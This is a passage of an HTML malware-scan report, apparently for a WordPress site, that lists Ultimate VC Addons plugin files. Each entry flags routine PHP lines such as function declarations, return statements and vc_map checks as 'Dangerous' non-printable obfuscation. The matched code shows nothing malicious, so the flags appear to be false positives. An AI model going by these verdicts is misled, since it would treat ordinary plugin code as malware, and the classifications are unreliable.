</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1222</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #DD0000">'vc_map'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1223</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_box_init</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_modal_assets</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_is_medium_device</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_modal_init</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$is_medium</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">modal_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_303").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_headings.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 31.81 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_304" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } function </span><span style="color: #0000BB">ultimate_heading_spacer</span><span style="color: #007700">(</span><span style="color: #0000BB">$wrapper_class</span><span style="color: #007700">, </span><span style="color: #0000BB">$wrapper_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$icon_inline</span><span style="color: #007700">) { </span><span style="color: #0000BB">$spacer </span><span style="color: #007700">= </span><span style="color: #DD0000">'<div class="uvc-heading-spacer '</span><span style="color: #007700">.</span><span style="color: #0000BB">$wrapper_class</span><span style="color: #007700">.</span><span style="color: #DD0000">'" style="'</span><span style="color: #007700">.</span><span style="color: #0000BB">$wrapper_style</span><span style="color: #007700">.</span><span style="color: #DD0000">'">'</span><span style="color: #007700">.</span><span style="color: #0000BB">$icon_inline</span><span style="color: #007700">.</span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">; return </span><span style="color: #0000BB">$spacer</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_Headings</span><span style="color: #007700">; if(</span><span style="color: #0000BB">class_</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_headings_assets</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_headings_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 538</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_headings_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 760</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 762</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_heading_spacer</span><span style="color: #007700">(</span><span style="color: #0000BB">$wrapper_class</span><span style="color: #007700">, </span><span style="color: #0000BB">$wrapper_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$icon_inline</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 765</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$spacer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_304").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_animation.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_305" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } function </span><span style="color: #0000BB">animate_shortcode_mapper</span><span style="color: #007700">(){ if(</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)){ </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">"name" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Animation Block"</span><span style="color: #007700">, </span><span style="color: #DD0000">"ultimate_vc"</span><span style="color: #007700">), </span><span style="color: #DD0000">"base" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"ult_animation_block"</span><span style="color: #007700">, </span><span style="color: #DD0000">"icon" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"animation_block"</span><span style="color: #007700">, </span><span style="color: #DD0000">"class" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"animation_block"</span><span style="color: #007700">, </span><span style="color: #DD0000">"as_parent" </span><span style="color: #007700">=> array(</span><span style="color: #DD0000">'ex</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">animate_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">=</span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">animate_shortcode_mapper</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_305").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_pricing_tables.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 27.64 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_306" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_Pricing_Table</span><span style="color: #007700">; if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_pricing' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_pricing </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">price_table_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_pricing_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 694</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_pricing_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 720</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_306").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_info_banner.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 32.38 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_307" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Info_Banner'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Info_Banner </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Info_Banner</span><span style="color: #007700">; } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_info_banner' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_info_bann</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_info_banner_assets</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 550</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats banner</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 551</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 850</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_307").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_team.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 58.42 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_308" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">(); } function </span><span style="color: #0000BB">init_team</span><span style="color: #007700">(){ if(</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">"name" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Team"</span><span style="color: #007700">, </span><span style="color: #DD0000">"ultimate_vc"</span><span style="color: #007700">), </span><span style="color: #DD0000">"base" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"ult_team"</span><span style="color: #007700">, </span><span style="color: #DD0000">"icon" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"vc_icon_team"</span><span style="color: #007700">, </span><span style="color: #DD0000">"class" </span><span style="color: #007700">=> </span><span style="color: #DD0000">""</span><span style="color: #007700">, </span><span style="color: #DD0000">"content_element" </span><span style="color: #007700">=> </span><span style="color: #0000BB">true</span><span style="color: #007700">, </span><span style="color: #DD0000">"controls" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"full"</span><span style="color: #007700">, </span><span style="color: #DD0000">"category" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"Ultimat</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">"get_ultimate_font_family" </span><span style="color: #007700">) ? </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$team_member_name_font </span><span style="color: #007700">) : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_style' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 169</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">"get_ultimate_font_family" </span><span style="color: #007700">) ? </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$team_member_position_font </span><span style="color: #007700">) : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
